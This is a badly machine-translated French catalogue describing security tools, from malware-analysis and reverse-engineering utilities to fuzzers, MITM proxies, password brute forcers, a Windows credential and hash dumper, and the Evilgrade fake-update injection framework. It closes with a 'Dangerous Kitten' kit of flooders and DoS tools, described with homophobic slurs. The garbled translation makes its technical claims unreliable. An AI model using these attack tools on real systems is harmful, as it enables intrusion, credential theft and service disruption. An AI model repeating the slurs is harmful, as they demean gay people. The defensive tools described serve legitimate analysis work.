* Voir les paramètres de zone de sécurité efficace pour toute la zone de sécurité sur l’ordinateur local ou exportées à partir d’un ordinateur distant et d’identifier si chaque paramètre a été créé par la politique.
* Comparez les paramètres entre deux ou plusieurs zones de sécurité ou de modèles.
* Voir et comparer des ensembles complets de paramètres capturés sur différents ordinateurs ou sur un seul ordinateur dans le temps (par exemple, pour déterminer si un système a dévié de ses réglages de base).
* Résultats à l’exportation vers Excel ou vers un fichier texte Comma Separated Values ​​(CSV).
* Comparaison des résultats du filtre pour voir seulement les différences ou les conflits.
* Trier, réorganiser et redimensionner les colonnes du résultat.
* Copie sélectionné ou tous les résultats dans le presse papier.

L’objectif du projet INetSim est d’effectuer une analyse rapide d’exécution du comportement du réseau des échantillons de logiciels malveillants inconnus dans un environnement de laboratoire.

Modules pour la simulation des services suivants sont inclus:

* POP3 / POP3S
* Ident
* Finger
* Syslog
* Dummy.

Immunité Debugger
Immunité Debugger est un nouveau moyen puissant pour écrire des exploits, analyser les programmes malveillants, et d’inverser les fichiers binaires ingénieur. Il s’appuie sur une interface utilisateur graphique solides avec la fonction, d’une part de l’industrie l’outil d’analyse tas construit spécifiquement pour la création du tas, et un grand et bien pris en charge l’API Python pour l’extensibilité facile.

-Un débogueur avec des fonctionnalités conçues spécifiquement pour l’industrie de la sécurité
-Morceaux d’exploiter le temps de développement de 50%
-Simple, compréhensible interfaces
-Robuste et puissant langage de script pour automatiser le débogage intelligent
-Léger et rapide mise au point pour prévenir la corruption lors de l’analyse complexe
-Une connexion à fuzzers et d’exploiter les outils de développement

Mallory est un transparent TCP et UDP proxy. Il peut être utilisé pour obtenir lors de ces difficiles à intercepter des flux réseaux, évaluer les applications Web mobile délicate, ou peut-être il suffit de tirer une blague à votre ami.

En termes plus techniques, Mallory est un extensible TCP / UDP homme dans le milieu proxy qui est conçu pour être exécuté en tant que passerelle.

L’objectif est pour l’homme dans le milieu de la circulation des fins de test. La configuration idéale pour Mallory est d’avoir une «LAN» ou «victime» que Mallory réseau agit en tant que passerelle pour. Cela peut être configuré dans un environnement de machines utilisant des interfaces d’accueil virtal seul réseau. Les machines virtuelles victime puis configure la machine Mallory que la passerelle par régler manuellement sa passerelle. La machine passerelle aura au moins une interface WAN qui accorde l’accès Internet. Le réseau victime utilise ensuite la passerelle Mallory pour acheminer le trafic.

Structure des dossiers

* Ca – autorité de certification fichiers, y compris la clé privée de Mallory
* Certs – certs MiTM qui sont créés à la volée
* Db – répertoire où sont stockées toutes les données des fichiers mallory
mallory * – répertoire vide
* Src – où le code des vies
* Les scripts – scripts utilisés pour configurer l’environnement de mallory

Fuzzer fichier MiniFuzz & 3bdisplaylang% = fr & pf = true
MiniFuzz est un outil de test de base conçu pour aider à détecter les failles du code qui peut exposer les failles de sécurité dans le code de gestion des fichiers. Cet outil crée de multiples variations aléatoires du contenu du fichier et il se nourrit de l’application pour tester le code dans une tentative d’exposer le comportement des applications inattendues et potentiellement dangereux.

NetworkScanViewer est une application graphique conçu pour aider afficher les résultats de nessus (v4) et nmap (v5) les résultats d’analyse. Il combine les fonctionnalités des deux NessusViewer et NmapViewer.

Le chargement de l’application de l’analyse des données de nessus et nmap XML, fait un peu de nettoyage des données, puis affiche les résultats sur la liste des résultats. Les données de la liste peut être triée en cliquant sur les en-têtes de colonnes, il est facile de commander et de trouver de l’information notamment. Il ya aussi la possibilité de filtrer des informations spécifiques, comme hôte, le port, etc service il est donc facile de forer vers le bas pour des informations spécifiques.

Les exportations de la fonctionnalité d’exportation en utilisant les données figurant dans la liste des résultats, donc si vous changez l’ordre de tri ou filtrer les résultats, il se reflète dans l’exportation. Il est également possible d’exclure de manière permanente scripts qui vient de générer du bruit par un clic droit sur l’élément et en sélectionnant « Ignorer Plugin » dans le menu contextuel. scripts exclus peuvent être rajoutés à tout moment en utilisant la fenêtre Options.


* Le nettoyage des données
* Exporter au format CSV et XML
* Sortable colonnes de données
* Filtrage des données
* Script exclusion

ProcNetMonitor est l’outil gratuit pour surveiller l’activité réseau de tous les processus en cours dans le système. Il affiche tous les ports d’un réseau ouvert (TCP / UDP) et les connexions réseau actives pour chaque processus. Il a avancé la couleur système basé analyse automatique pour le rendre facile de distinguer les processus réseau orienté des autres avec un seul coup d’œil sur la liste.

Il présente également des caractéristiques uniques »Port Finder » de chercher facilement le port particulier dans tous les processus en cours avec un seul clic. Il est également livré avec fonction d’exportation pour enregistrer la liste complète des processus de port à un fichier HTML standard pour l’analyse hors-ligne.

SQLInject Finder
Brève description ¶

Simple script python qui analyse à travers un pcap et se penche sur l’EEG et des données requête POST pour suspectes et SQL injecte possible. Règles pour contrôler l’injection SQL peuvent être facilement ajoutés. La sortie peut être imprimé avec soin sur la ligne de commande ou en format délimité par des tabulations.

La sortie comprend:

* L’adresse IP suspectes
* La page Web attaqué
* Le paramètre et la valeur utilisée
* Le numéro de châssis du paquet dans le pcap (peut être utilisé pour trouver exactement où le paquet est dans Wireshark)
* La raison pour laquelle la demande a été signalée

Avec le temps, les auteurs de malwares sont de plus en plus intelligents et ont réussi à trouver des moyens d’échapper à un logiciel de sécurité. La seule chose entre une « propre » machine et les logiciels malveillants est un analyseur de désosser les logiciels malveillants /. Comme malwares s’équiper avec les nouvelles techniques, il devient impératif pour la rétro-ingénierie pour tester les logiciels malveillants dans le temps mis à leur disposition. Des outils comme TitanEngine va sûrement nous aider dans notre analyse de logiciels malveillants et les efforts d’ingénierie inverse! Il est l’un des outils que nous avons été en attente pour le téléchargement depuis le moment où il a été annoncé lors de la BlackHat 09!

TitanEngine est livré OPEN SOURCE cadre de la Labs réversibles qui peuvent être utilisés pour effectuer plus de 250 fonctions! Le meilleur de tous, vous pouvez avoir tout cela automatisé. Il peut également être utilisé pour fabriquer de nouveaux outils qui fonctionnent avec des fichiers PE! Les deux – 32 bits et 64 bits formats sont supportés! Il peut être utilisé pour créer tous les types connus de déballeurs. Ses fonctions sont les suivantes:

* SDK a 250 fonctions documentées
* Automatisation facile de tous les outils de renverser
* Prend en charge x86 et x64
* Possibilité de créer: statique, dynamique et générique déballeurs
* Testé sur plus de 150 déballeurs
* C’est gratuit et open source LGPL3!
* Intégré x86/x64 débogueur
* Intégré x86/x64 désassembleur
* Dumper la mémoire intégrée
traceur import * intégré et du fixateur
* Fixateur de réinstallation intégré
* Realigner de fichiers intégré
* Fonctions de travailler avec TLS, ressources, les exportations, …

inspecteur du noyau Tuluka
uluka est un nouvel outil puissant (antirootkit), qui a les caractéristiques suivantes:

* Détecte les processus cachés, les conducteurs et les dispositifs
* Détecte les IRP crochets
* Identifie la substitution de certains champs dans la structure DRIVER_OBJECT
* signatures pilote vérifie
* Détecte et restaure SSDT crochets
* Détecte les descripteurs de suspect dans GDT
* De détection de décrochage IDT
* De détection de décrochage SYSENTER
* Affiche la liste des threads du système et vous permet de les suspendre
* API et de détection de décrochage en ligne
* Indique les valeurs réelles des registres de débogage, même si la lecture de ces registres est contrôlée par une personne
* Permet de trouver le module du système de l’adresse dans ce module
* Permet d’afficher le contenu de la mémoire du noyau et de l’enregistrer sur le disque
* Vous permet d’enregistrer les pilotes du noyau et des modules principaux de tous les processus
* Permet de mettre fin à tout processus
* Est capable de dissasemble gestionnaires d’interruption et de la CEI, les services système, routines début de threads du système et beaucoup plus
* Permet de construire la pile pour appareil sélectionné
* Beaucoup plus ..

Affiche les informations ci-dessus indiqué dans l’interface graphique pour l’utilisateur de voir et sans doute d’utiliser ces informations pour l’analyse

VERA, le programme de l’ingénierie inverse de visualisation basé sur le projet Ether.

Reverse Engineering par diapositives Crayon de la Blackhat parler.

Analyse Malware via les extensions de virtualisation matérielle: Ether

WinAPIOverride32 est une source ouverte et un logiciel avancé de surveillance API pour les systèmes d’exploitation Windows. Vous pouvez l’utiliser pour surveiller et / ou remplacer toute fonction d’un processus! Vous pouvez le faire pour les fonctions API ou exécutable fonctions internes. Cela peut être particulièrement utile lorsque vous traitez avec des malwares ou de tenter d’inverser certaines applications ingénieur.

Quelques-unes des fonctions WinAPIOverride32 sont les suivants:

* Vous pouvez définir des filtres sur les paramètres ou de résultat de la fonction
* Vous pouvez définir des filtres sur les dll de rejeter les appels de Windows DLL système
* Vous pouvez fonctions crochet à l’intérieur du processus cible non seulement API
* Vous pouvez brancher asm fonctions avec les paramètres passés à travers les registres
* Vous pouvez exceptions matériel et des logiciels crochet
* Double résultats et le flotteur sont enregistrés
* Vous pouvez facilement remplacer une API ou tout autre procédé fonction interne
* Vous pouvez casser processus avant et / ou après appel à la fonction de mémoire à changement ou des registres
* Vous pouvez appeler des fonctions qui sont à l’intérieur du processus distants
* Peut interfaces COM crochet OLE et ActiveX
Les types d’utilisateurs * (enum, struct et syndicat) et l’utilisateur définit sont pris en charge
* Tout est est fait comme modules: vous pouvez vous connecter ou de remplacer de façon indépendante pour toute fonction
* Open Source
* Une bibliothèque est prévue pour les développeurs qui ont l’intention de construire un logiciel de leur accrochage

WinAPIOverride32 tente de combler le fossé entre les logiciels classiques de surveillance API et les débogueurs. Vous pouvez aussi « casser » une application ciblée avant ou après un appel de fonction, permettant des modifications de la mémoire ou des registres, et il peut directement appeler des fonctions de l’application ciblée. Il s’agit d’une application merveilleuse source ouverte, écrit en C + +.

Analyseur de l’état du système Windows
La fonctionnalité de base de l’outil de l’état du système Analyzer est de vous permettre de comparer deux photos prises à différents points dans le temps. Cela vous permet de comparer l’état d’une machine à la fois avant et après une demande d’installation ou probablement vous pouvez l’utiliser dans votre VM comme une première étape dans l’analyse des logiciels malveillants ou ingénierie inverse

Cet outil est une partie de la Windows 2008 R2 Logo de certification de logiciels et Windows 2008 R2 Logo Logiciel outils de certification.Par conséquent, vous aurez besoin de télécharger les pochettes d’information pour obtenir le système d’État Analyzer.

Yara est un outil visant à aider les chercheurs à identifier les logiciels malveillants et classer des échantillons de logiciels malveillants. Avec YARA vous pouvez créer des descriptions de familles de logiciels malveillants en fonction des modèles textuels ou binaires contenues sur des échantillons de ces familles. Chaque description comprend un ensemble de cordes et une expression booléenne qui détermine sa logique

analyse binaire est impératif de protection des COTS (commune hors-the-shelf) et l’analyse des programmes et se défendre contre la multitude de codes malveillants, où le code source n’est pas disponible, et le binaire peut même être masquée. En outre, l’analyse binaire fournit la réalité de terrain sur le comportement du programme puisque les ordinateurs d’exécuter des binaires (exécutables), pas de code source. Cependant, l’analyse binaire est difficile en raison de l’absence de la sémantique de niveau supérieur.De nombreuses techniques de niveau supérieur sont souvent insuffisants pour l’analyse, même bénigne binaires, et encore moins binaires potentiellement malveillants. Ainsi, nous avons besoin de développer des outils et techniques qui travaillent au niveau binaire, peut être utilisé pour l’analyse des logiciels commerciaux, ainsi que les binaires malveillants.

Le projet vise BitBlaze pour concevoir et développer une plate-forme d’analyse puissant binaires et emploient la plate-forme afin de (1) d’analyser et de développer de nouveaux mécanismes de protection et de diagnostic et de COTS (2) analyser, comprendre et développer des défenses contre les codes malveillants. Le projet s’efforce également BitBlaze d’ouvrir de nouveaux domaines de l’analyse binaire, qui fournit des solutions saines et efficaces à des applications au-delà des logiciels de sécurité et de défense codes malveillants, tels que l’ingénierie inverse du protocole et la génération d’empreintes digitales.


Le fuzzer doit beaucoup de son efficacité pour la génération dynamique de très longue durée de liquidation des séquences d’opérations DOM dans plusieurs documents, inspecter des objets retournés, recursing en eux, et la création de références nœud circulaire que les mécanismes de stress-test de collecte des ordures.

cross_fuzz détaillée fuzzing algorithme:

1. Ouvrez deux fenêtres avec des documents de tout type (DOM-activé). Simple documents HTML, XHTML, SVG et sont choisis au hasard comme des cibles par défaut – bien que tout autre, les formats pris en charge éventuellement plugin-pourraient être ciblés à la place.

2. Crawl DOM hiérarchie du premier document, la collecte de références à des objets rencontrés pour une réutilisation ultérieure.objets visitées et références recueillies sont étiquetés en utilisant une propriété injecté pour éviter une récursion infinie; une liste noire secondaire est utilisée pour empêcher la navigation loin ou descendre dans la fenêtre principale. Critique, mélange aléatoire et le contrôle de sortance récursivité sont utilisés pour assurer une bonne couverture.

3. ramper DOM Répétez, au hasard peaufiner rencontrées propriétés de l’objet en les plaçant à une l’une des références précédemment enregistrées (ou, avec une certaine probabilité, à un d’une poignée de codé en dur « intéressant » valeurs).

4. ramper DOM Répétez, au hasard d’appel rencontrées méthodes de l’objet. paramètres d’appel sont synthétisés en utilisant des références recueillies et «intéressant» valeurs, comme indiqué ci-dessus. Si une méthode retourne un objet, sa sortie est ensuite analysé et modifié d’une manière similaire.

5. Aléatoirement détruire premier document en utilisant l’un des plusieurs méthodes possibles, la collecte des ordures bascule.

6. Effectuer le même ensemble de ramper et opérations tweak pour le deuxième document, mais les références utiliser les données collectées à partir du premier document pour écraser les propriétés et les méthodes d’appel dans le second.

7. Aléatoirement détruire les fenêtres de document, effectuer plus d’un pourcentage de références recueillies pour le prochain cycle de fuzzing.

dirtyJOE – Java ensemble Editor est un éditeur complexe et visionneuse pour les fichiers binaires Java compilés (fichiers de classe.). La version actuelle a encore quelques limitations, mais j’espère que ceux qui seront supprimés dans les prochaines versions.

dirtyJOE est gratuit pour un usage non-commercial.

dirtyJOE est entièrement écrit en C + +, aucune bibliothèque tierce partie étaient utilisés.

Principales caractéristiques:

* Viewer pour: constant pool, méthodes, champs, attributs
* Sous la direction de:-tête du fichier constant pool, bytecode,

Cet outil a été libéré le chemin du retour en l’an 2006 par M. Michal Zalewski. Il est la croyance populaire que les protocoles sécurisés tels que SSH, HTTPS, FTPS, etc sont complètement à l’abri de la surveillance. Mais, fl0p va vous prouver le contraire.

fl0p est un simple flux analyse passive L7 fingerprinter. Il examine passivement la suite des échanges client-serveur à l’intérieur de votre réseau avec leurs leur couche relative 7 tailles de charge utile et des intervalles de transmission. Le résultat est ensuite jumelés avec une base de données de signatures modèle de trafic de déduire de ses observations. Il le fait non pas en reniflant, mais seulement avec le résultat. C’est pourquoi ayant une bonne base de données est la base de données important.The peut être trouvé dans le fichier fl0p.fp. Vous vous pouvez ajouter et améliorer la base de données avec vos entrées.

De la sortie que l’outil affiche, vous pouvez déchiffrer les adresses IP des deux hôtes participant à la communication. En cas de trafic HTTPS, vous pouvez peut-être aussi vérifier le site que le client a demandées.

Il a été lâchement basé sur un autre outil merveilleux – p0f et a été codé en C. Ceci étant la raison, il est pris en charge sur de nombreux systèmes – Linux, * BSD, MacOS X, AIX, et Cygwin.

Cela peut être une intéressante si vous avez beaucoup de temps pour planifier à l’avance votre attaque. Vous pouvez continuer à regarder à la sortie et en apprendre davantage sur le réseau.

JavaSnoop est un outil qui vous permet d’intercepter les méthodes, modifier les données et ailleurs tester la sécurité des applications Java sur votre bureau. Il le fait, en vous permettant de l’attacher à un processus existant (comme un débogueur) et instantanément avec altération des appels de méthode, d’exécuter du code personnalisé, ou simplement regarder ce qui se passe sur le système. Comment faut-il joindre à un processus existant? Il installe stageloading « crochets » avec l’API Java Instrumentation et en travaillant avec certains bytecode.

Il peut être utile pour l’analyse de chaîne de base de registre Windows, les appels d’API, les commandes IRC, détection DLL code appelé et anti-VMWare. Il affiche en-têtes détaillée des PE avec tous ses détails l’article, l’importation et l’exportation des symboles etc Il peut également effectuer une vidange complète de l’ASCII PE avec d’autres options. Il peut aussi générer des diverses sections d’un PE, comme l’en-tête DOS, DOS Stub, PE-tête de fichier, l’image d’en-tête en option, la section de table, Répertoires de données, articles, etc analyseur Malware vous aidera également à l’analyse de code et de démonter les logiciels malveillants. Il peut également effectuer une vérification de logiciels malveillants en ligne à la base de signatures PEiD, il peut également détecter les emballeurs utilisé pour compresser le fichier. Il fournit également une fonctionnalité de traçage qui peuvent être utilisés pour identifier les anti-debugging tricks appels, appels de fichiers système de manipulation, rootkit crochets, crochets de clavier, DEP modification des paramètres, etc

Construire une station automatisée d’analyse personnalisables logiciels malveillants en utilisant uniquement des composants disponibles gratuitement à l’exception de la cible OS (Windows XP) elle-même. En outre, un accent particulier réside dans la manipulation une énorme quantité d’échantillons de logiciels malveillants et la mise en œuvre effective au Comme l’objectif principal du lecteur de ce document devrait être en mesure de construire sa propre installation et de configuration spécifiques tout en étant libre dans sa décision les composants à utiliser.

antipyrétiques et le débogueur REpdb faciliter l’accès à l’obtention de source fermée applications Python source.

En un mot il vous permet de prendre un objet dans la mémoire au code source, sans avoir besoin de l’accès au bytecode directement sur le disque. Cela peut être utile si le pyc applictions sur disque sont brouillées dans l’une des nombreuses façons.

Présentation de blackhat ici:

StreamArmor est l’outil sophistiqué pour la découverte cachée flux de données alternatifs (ADS) ainsi que de les nettoyer complètement le système. C’est l’analyse automatique de pointe associée à un mécanisme de vérification en ligne menace en fait le meilleur outil disponible sur le marché pour éradiquer le mal d’eau. StreamArmor rapide est livré avec scanner multi ADS fileté qui peut parcourir de façon récursive sur le système entier et découvrir rapidement tous les ruisseaux cachés. Toutes ces découvertes flux sont représentés en utilisant la couleur spécifique Patten fonction du niveau de menace qui le rend facile pour les yeux de l’homme de faire la distinction entre les suspects et les cours d’eau normale.

StreamArmor a intégré dans le mécanisme de détection avancée de type de fichier qui examine le contenu du fichier de détecter avec précision le type de fichier de flux. Il est donc grand outil de l’analyse médico-légale dans la découverte de documents cachés / images / audio / vidéo / base de données des fichiers / archives dans le flux de données alternatifs. StreamArmor est autonome, application portable qui ne nécessite aucune installation. Il peut être copié à n’importe quel endroit dans le système et exécuté directement.

tcpdump est un outil informatique commun de débogage réseau qui s’exécute sous la ligne de commande. Il permet à l’utilisateur d’intercepter et afficher TCP / IP et les autres paquets sont transmises ou reçues sur un réseau auquel l’ordinateur est connecté.

Le Virtual USB Analyzer est un outil gratuit et open source permettant de visualiser les journaux des paquets USB, à partir d’outils matériels ou logiciels renifleurs USB. Pour autant que nous savons, c’est le premier outil au monde pour fournir une visualisation graphique avec des dumps hexa premières et d’analyse de protocole de haut niveau.

Le Virtual USB Analyzer n’est pas en soi un outil sniffeur USB. Il est juste une interface utilisateur permettant de visualiser les journaux. Il supporte actuellement trois formats de journaux, mais il est conçu pour être facilement extensible. Avec une dizaine de lignes de code Python en couple, vous pouvez ajouter le support pour votre format de journal favori.

Nous avons développé VUSB-analyseur chez VMware comme un moyen efficace pour déboguer notre virtualisation propre pile USB.Nous voulions un outil qui a fait, il est facile de voir les problèmes à un coup d’œil, et nous voulions un moyen de résoudre les deux exactitude des bugs de performance. En conséquence, nous nous sommes retrouvés avec ce que nous pensons est un outil assez unique. Nous sommes ravis d’avoir maintenant l’occasion de la libération de cet outil en tant que logiciel open source, sous licence MIT.
VMWare offre la possibilité de jeter tout le trafic usb au plus bas niveau à un fichier de vidage. Nous allons décrire ici comment activer cette fonction, et en outre publier un script pour convertir le fichier dump au format PCAP, adapté pour une utilisation avec wireshark.



Process Hacker
Process Hacker est un élément-emballés outil pour manipuler les procédés et services sur votre ordinateur.

Un simple arborescence personnalisable avec mise en surbrillance de vous montrer les processus s’exécutant sur votre ordinateur.
# Graphiques de performances détaillés.
# Une liste complète des services et un contrôle total sur leur (marche, arrêt, pause, reprendre et supprimer).
# Une liste des connexions réseau.
# Des informations complètes pour tous les processus: l’histoire complète la performance des processus, annonce fil et piles avec les symboles dbghelp, les informations du jeton, informations sur les fichiers du module et cartographiés, la carte mémoire virtuelle, les variables d’environnement, poignées, …
# Contrôle total sur tous les processus, les processus, même protégés par des rootkits ou des logiciels de sécurité. Son pilote en mode noyau a des capacités uniques qui lui permet de résilier, de suspendre et de reprendre tous les processus et les threads, y compris les logiciels comme IceSword, avast! anti-virus, AVG Anti-Virus, Comodo Internet Security, etc (pour n’en nommer que quelques-uns).
# Trouver les processus cachés et de les dénoncer. Process Hacker détecte les processus cachés par les rootkits simples telles que le Hacker Defender et FU.
# Easy DLL injection et de déchargement – simplement un clic droit et sélectionnez un processus « Injecter DLL » afin d’injecter et un clic droit sur un module et sélectionnez « Décharger » pour décharger!
# Beaucoup d’autres fonctionnalités …

Au cours de tests d’intrusion, on peut voir que les épaisses clients parfois communiquer avec un serveur dont l’adresse IP est codé en dur pour it.The communication HTTP entre le client et le serveur est par exemple difficile d’intercepter et d’essai. Sniff-n-Snip est un utilitaire très utile dans de tels scénarios. Il renifle les paquets HTTP du client vers le serveur et les transmet à votre proxy préférée (Burp, WebScarab, etc Paros).

Des entrées d’utilisateur:

L’outil prévoit l’entrée d’utilisateur suivants:

* Nombre de l’interface d’écoute. Ce numéro peut être trouvé en utilisant le « -l ».
* Source IP, port source (en option), IP de destination, et Destination Port de la session TCP qui est à dédaigner
* IP cible et la cible Port du proxy Interceptor. Généralement, les valeurs seront, 8080.
* L’outil peut être forcé à écouter sur le mode promiscuous « dans le »-p « commutateur. Ceci est désactivée par défaut.


* WinPcap doit être installé sur le système, l’outil a besoin de cette bibliothèque pour l’analyse des paquets.

Le vol TFTP
Le vol TFTP est un outil qui permet de numériser rapidement / bruteforce un serveur tftp pour les fichiers et les télécharger instantanément. – des téléchargements de fichiers basé sur un modèle ou une liste de fichiers – cherche des serveurs TFTP sur une plage d’adresses IP de la cible

TFTPTheft est une collection de deux scripts – un pour le téléchargement de fichiers à partir de cibles découvert et l’autre pour découvrir les objectifs. Les noms de ces scripts Python deux sont – et Ainsi, vous pouvez considérer ce assez complet.C’est un outil qui permet de numériser rapidement / bruteforce un serveur TFTP pour les fichiers et les télécharger instantanément. Il peut le faire, parce que TFTP, le protocole Trivial FTP souffre encore d’un inconvénient majeur – pas d’authentification.

evilgrade rapport de recherche internationale
Il est une structure modulaire qui nous permettent de tirer parti des implémentations de mise à niveau pauvres en injectant des mises à jour de faux.

Ce que vous pouvez faire est de laisser ISR-Evilgrade sais que quelqu’un est demandé pour une mise à jour, et c’est tout. Le reste sera fait par l’outil lui-même. L’outil d’origine va télécharger une mise à jour que si elle a été téléchargé depuis le site principal au lieu de votre serveur de mise à jour interne! A partir de maintenant, rapport de recherche internationale-Evilgrade prend en charge les modules suivants:

FreeRIP 3,30 *
* Jet photo 4.7.2
Teamviewer * 5.1.9385
ISOpen * 4.5.0
* Istat.
Gom *
* ATube Catcher 1.0.300
Vidbox * 7,5
* Ccleaner 30/02/1130
* FCleaner
* AllMyNotes 1,26
* Notepad + + 5.8.2
* Java 1.6.0_22 winxp/win7
aMSN 0.98.3 *
* <= Appleupdate (Safari 5.0.2 7533.18.5, <Itunes =, <= 7.6.8 Quicktime 1675)
* Mirc 7,14
* Mise à jour Windows (IE6 lastversion, IE7 7.0.5730.13, ie8 8.0.60001.18702, Microsoft Works)
Dap *
Winscp * 4.2.9
Script AutoIt *
* Clamwin
* Installer AppTapp 3.11 (Iphone / Itunes)
* GetJar (
* Google Analytics Javascript injection
Speedbit * Optimizer 3.0 accélération vidéo /
Winamp 5.581 *
* TechTracker (CNET) 1.3.1 (Build 55)
* 2.4.8es Nokiasoftware mise à jour du firmware (logiciel Windows)
* Nokia firmware v20.2.011
BSplayer * 2.53.1034
* Apt (<Ubuntu 10.04 LTS)
ÜberTwitter * 4.6 (0.971)
Facebook Blackberry * | Twitter
Cpan * 1,9402
* VirtualBox (3.2.8)
* Discussion Express
* Filezilla
* Flashget
* Miranda
* Orbit
* Photoscape.
AntiRootkit Panda *
* Skype
* Sunbelt
* SUPERAntiSpyware
* <Trillian =
Adium * 1.3.10 (cadre Sparkle)
* VMware

les vecteurs d’attaque:

Interne décor:
– L’accès des DNS
– ARP spoofing
– DNS Cache Poisoning
– DHCP spoofing

Externe décor:
– L’accès des DNS
– DNS Cache Poisoning

Adobe et d’autres utilisations javascript dans les fichiers PDF à améliorer le workflow standard, par exemple la connexion à la base de données, la vérification orthographique, impression n visualisation, etc. Lorsque nous ouvrons pdf dans le lecteur, il exécute ce code javascript (tu nous savons tous que). si l’objectif de Spiderpig est de trouver des bogues dans le moteur javascript pour lire les pdf’s. Spiderpig lit prototype méthodes à partir d’un fichier d’entrée et crée un fichier pdf. La plupart des fuzzers pdf qui sont disponibles sur Internet sont fuzzers format de fichier qui tente de fuzz format d’Adobe fichier implementation.I na pas trouver un fuzzer qui Fuzz imeplementaiton javascript Adobe, Nous avons donc ici un fuzzer Spiderpig javascript pour format de fichier pdf qui tente devisser pour lire les pdf en utilisant des méthodes javascript.

De vérification des pouvoirs

Bruter est un réseau parallèle connexion brute forcer sur Win32. Cet outil est destiné à démontrer l’importance de choisir des mots de passe forts. Le but de Bruter est de soutenir une variété de services qui permettent l’authentification à distance.

Cain & Abel
Cain & Abel est un outil de récupération de mot de passe pour systèmes d’exploitation Microsoft. Il permet une récupération aisée des différents types de mots de passe en sniffant le réseau, craquage de mots de passe crypté à l’aide du dictionnaire, force brute et les attaques cryptanalyse, enregistrement des conversations VoIP, le décodage des mots de passe brouillés, récupérer les clés de réseau sans fil, révélant boîtes mot de passe, découvrir des mots de passe en cache de routage et d’analyse protocole.

KrbGuess est un petit outil simple et qui peut être utilisée durant les essais de sécurité de deviner les noms d’utilisateur valides à l’encontre d’un environnement Kerberos. Il vous permet de faire cela en étudiant la réponse à une demande TGT pour le serveur KDC.L’outil fonctionne à la fois contre Microsoft Active Directory, le MIT et Heimdal Kerberos implémentations. En outre, il permet de détecter si un compte n’a pas de pré-authentification.

Medusa vérificateur parallèle connexion réseau
Medusa est destiné à être un rapide, massivement parallèle, modulaire, connexion brute forcer. L’objectif est de soutenir autant de services qui permettent l’authentification à distance possible. L’auteur considère les points suivants comme certains des principales caractéristiques de cette application:

– Essais de fil à base parallèle. essais par force brute peut être effectuée sur plusieurs hôtes, utilisateurs ou mots de passe en même temps.

– L’entrée d’utilisateur flexible. informations cible (hôte / utilisateur / mot de passe) peut être spécifié dans une variété de façons. Par exemple, chaque élément peut être soit une entrée unique ou d’un fichier contenant des entrées multiples. En outre, un format de fichier combinaison permet à l’utilisateur d’affiner leur liste cible.

– La conception modulaire. Chaque module de service existe un fichier mod. Indépendante. Cela signifie qu’aucune modification n’est nécessaire à l’application de base afin d’étendre la liste des services pris en charge pour brute force.

Ncrack est une authentification de réseau haute vitesse de fissuration outil. Il a été construit pour aider les entreprises à sécuriser leurs réseaux de manière proactive tous les tests de leurs hôtes et les périphériques réseau pour les mots de passe faibles.professionnels de la sécurité comptent également sur Ncrack lors de la vérification de leurs clients. Ncrack a été conçu selon une approche modulaire, une syntaxe de ligne de commande similaire à Nmap et un moteur dynamique qui peut adapter son comportement en fonction des informations réseau. Elle permet de rapides, de la vérification à grande échelle et fiable de plusieurs hôtes.

caractéristiques Ncrack comprennent une interface très souple octroi de l’utilisateur le plein contrôle du fonctionnement du réseau, permettant de très sophistiqué attaques bruteforcing, le calendrier des modèles pour la facilité d’utilisation, l’interaction d’exécution similaire à Nmap et bien plus.

Ncrack a démarré comme un «Google Summer of Code » du projet en 2009. Alors qu’il est déjà utile à certaines fins, il est encore inachevée, des logiciels de qualité alpha.

* Ncrack pouvez maintenant casser le Remote Desktop Protocol sur toutes les versions de Windows XP à partir et au-dessus, avec l’introduction du module de RDP. Les utilisateurs sont bien avisés de la bande de roulement pour le craquage des machines Windows XP, car ils ne peuvent pas gérer plusieurs connexions simultanées RDP.
* Mise en œuvre du module SMB qui peut se fissurer Microsoft SMB / CIFS services ainsi que UNIX serveurs Samba.
* Lancement de la ‘-f’ option, ce qui oblige à quitter Ncrack craquage d’un service après qu’il trouve un titre de compétence pour cela.Spécification de l’option à deux reprises comme « -f-f» fera Ncrack tcomplètement quitter après tout titre se trouve sur tout service.
* Ajout du support pour les essais à blanc le mot de passe. Ncrack va maintenant tester une entrée vide chaque fois qu’il voit une ligne vide dans l’une des listes de mots. Le même comportement s’applique pour le passage des options utilisateur »ou« de passage ».
* Amélioration de la scorpion Ncrack logwith une version mise à jour SVG.

RSYaba est un outil pour exécuter des attaques par force brute contre divers services d’une manière similaire à Hydra et Méduse.L’outil a été rédigé après de mauvaises expériences à obtenir les outils existants de fonctionner correctement avec le protocole HTTP et SSH il a été décidé de faire un outil qui serait plus facile à configurer.
Télécharger RSYaba

L’outil est écrit en Ruby afin de modifier les scripts est beaucoup plus simple que d’avoir à changer C / C + + puis recompiler le code. Tous les modules de mesure sont basées sur les pierres précieuses Ruby standard, de sorte qu’ils traitent tous les trucs protocole qui veut dire qu’il ya un bon niveau d’abstraction pour le cadre d’attaque réelle.

Pendant la rédaction du module HTTP, une fonctionnalité a été ajoutée qui fait défaut dans tous les bruteforcers HTTP d’autres, la capacité de gérer l’authentification qui repose sur un cookie déjà fixés et, encore plus strictes, les formes qui utilisent des jetons unique afin d’éviter les attaques par force brute.

L’outil prend actuellement en charge HTTP, MySQL et SSH et de nouveaux modules seront ajoutés et mis à jour cette page en conséquence.

Sous la direction de Windows de vérification des pouvoirs
Sous la direction de Windows de vérification des pouvoirs (WCE) permet de lister les sessions d’ouverture de session et ajouter, modifier, supprimer la liste et les informations d’identification associées (ex.: LM / NT hash). Ceci peut être utilisé, par exemple, pour effectuer la transmission de la table de hachage sur Windows et également obtenir NT / LM hash à partir de la mémoire (les ouvertures de session interactive, services, connexions Bureau à distance, etc) qui peuvent être utilisés à d’autres attaques.
Compatible Windows XP, 2003, Vista, 7 et 2008 (Vista n’a pas été fait encore testé, mais il devrait fonctionner)

Un biscuit salé du réseau très rapide d’ouverture de session qui supporter de nombreux services

Dark Alley

Dangereuses Kitten
« Dangerous Kitten » tire son nom de la façon dont il a été initialement répartis – un rar incorporé dans un jpg, avec la photo d’un chaton dans une main, et le sous-titre « Il est dangereux d’y aller seul, profiter de cette ». Il s’agit d’un ensemble d’outils, dont beaucoup déjà ici, mais il ya des nouveaux outils qui ne sont pas n’importe où ailleurs sur le w / i / ki.

Liste d’outils (mise à jour v3)

* Windows (et du vin pour les pédés Linux et Mac)
o BWraep
o BWRaeper.NET
Leecher o Proxy Forum
o Longcat Flooder (distribué et autonome)
Flood Ping o
o rok / i / ts
o Sinflood
wgetraep o
o Certains app gay à unlimit connectiosn ip
Serveur SMTP o
o Tous les nouveaux équipements DoS
